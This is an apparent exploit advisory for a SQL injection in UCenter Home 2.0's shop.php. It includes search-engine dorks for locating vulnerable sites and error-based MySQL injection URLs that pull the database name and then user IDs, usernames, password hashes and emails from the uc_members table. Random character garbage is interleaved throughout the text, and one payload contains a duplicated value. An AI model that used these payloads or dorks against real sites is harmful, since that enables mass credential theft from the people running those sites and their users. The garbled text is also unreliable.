2 w2 l; p$ X, R( H' _+ D& [
__--==UCenter Home 2.0 -(0day) Remote SQL Injection Vulnerability==--__
! |6 d$ g. c: ?: o. _3 d! A3 j. o& P+ v+ {, D u0 d, u; e6 `
3 }# e; M2 m5 j8 _2 ]# d4 V% X4 b( F- w% B- K* e9 C; @
*/ Author : KnocKout
v) I- S4 q0 U& v& N7 f1 e; l3 `1 A# Y" ^
*/ Greatz : DaiMon,BARCOD3,RiskY and iranian hackers
0 Z6 D: p8 s# b4 K! J
) D/ `* G: Q, Q: m- ?$ M*/ Contact: knockoutr@msn.com
% r6 o- Z- w1 ]0 d" B' u
6 j p& ^* ^' R! q& w*/ Cyber-Warrior.org/CWKnocKout
2 g' b S3 N$ U
$ y8 k! |8 I, \" R__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==
0 }; a9 e; d0 t2 S0 v. F& e' E1 d: u; ?0 F5 v+ E4 R: X
Script : UCenter Home
: M# R9 P$ r: q% F g4 g [, ]5 s- k* d7 K+ L' g
Version : 2.0 3 K: l( h. z5 m) [
- M4 Y0 s( A2 @6 W$ }( A6 n5 i
Script HomePage : http://u.discuz.net/ 2 M; c, ^( r, c, K- d5 m; v
! o. U9 o/ ?6 z
__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==
/ z6 J) V: I0 l0 S& m7 \9 \; {' U7 _
Dork : Powered by UCenter inurl:shop.php?ac=view 8 E$ ?# U9 q- j; i, D
4 S* P6 ^3 K6 v6 oDork 2 : inurl:shop.php?ac=view&shopid=
. j1 n8 C7 @0 a% G
3 h- ]2 n. ~6 q__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==
! m* i# p' m) g8 ^6 W1 D+ o7 E' S8 e. U4 @/ E& p1 K `* Q' T$ x1 x
Vuln file : Shop.php
: T# l* A6 l) Q9 l7 e( u. D2 Z/ D* D1 Z4 K- F9 ]2 r
value's : (?)ac=view&shopid=
% l' H4 ]6 U6 |# {7 w! M
' I; @) E" d, bVulnerable Style : SQL Injection (MySQL Error Based)
* N* e$ J: s+ R( F5 A( W5 w$ {0 L" G, I1 h8 ]4 }& J" G
Need Metarials : Hex Conversion
. E R+ e3 f* @9 j( i Q6 K! O( R$ _2 r3 D, T
__--==__--==__--==__--==__--==__--==__--==__--==__--==__--== & V7 P( z9 h9 r$ v3 V+ \
; W d( X( \2 F' z/ z+ Q
Your Need victim Database name.
! c( X2 U0 c' ~4 C; ?9 |9 z3 ~8 T* b
for Inject : http://server/shop.php?ac=view&shopid=253 and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,unhex(hex(database())),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1 5 O M* |: g5 i2 W9 \1 J
2 S! I0 E* z2 L2 v' m V
..
1 o, g* Z; `+ \5 o2 k H, k5 Y }; r) ]* X* S
DB : Okey. : v. @( W. H' _# S
. y$ Q) X. C0 Eyour edit DB `[TARGET DB NAME]`
1 t* ^& s! t3 u: C% }8 Y
2 G- q; c) @/ C/ b. m' j4 T. O/ i, EExample : 'hiwir1_ucenter'
, g+ B, [3 _" h8 ]" W! _. ~1 i. q% @' G. b- t) d; m4 b; ]1 [
Edit : Okey. 5 U" f7 {0 `4 p x& A, z0 A
* \; i& v! H4 f. ~( {Your use Hex conversion. And edit Your SQL Injection Exploit.. ; q. p3 ~. D, D' z$ ]( L2 |
: A2 \! Q3 {) H0 h6 U- U/ d: T
# @, j7 k; V" _; N. t; K# \7 O* l
0 G5 `! z5 y- ~
Exploit Code : http://server/shop.php?ac=view&shopid=253 253 and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,cast(concat(uc_members.uid,0x3a,uc_members.username,0x3a,uc_members.password,0x3a,uc_members.email) as char),0x27,0x7e) FROM `hiwir1_ucenter`.uc_members LIMIT 0,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
9 @; q& {2 u9 e+ F6 K6 x |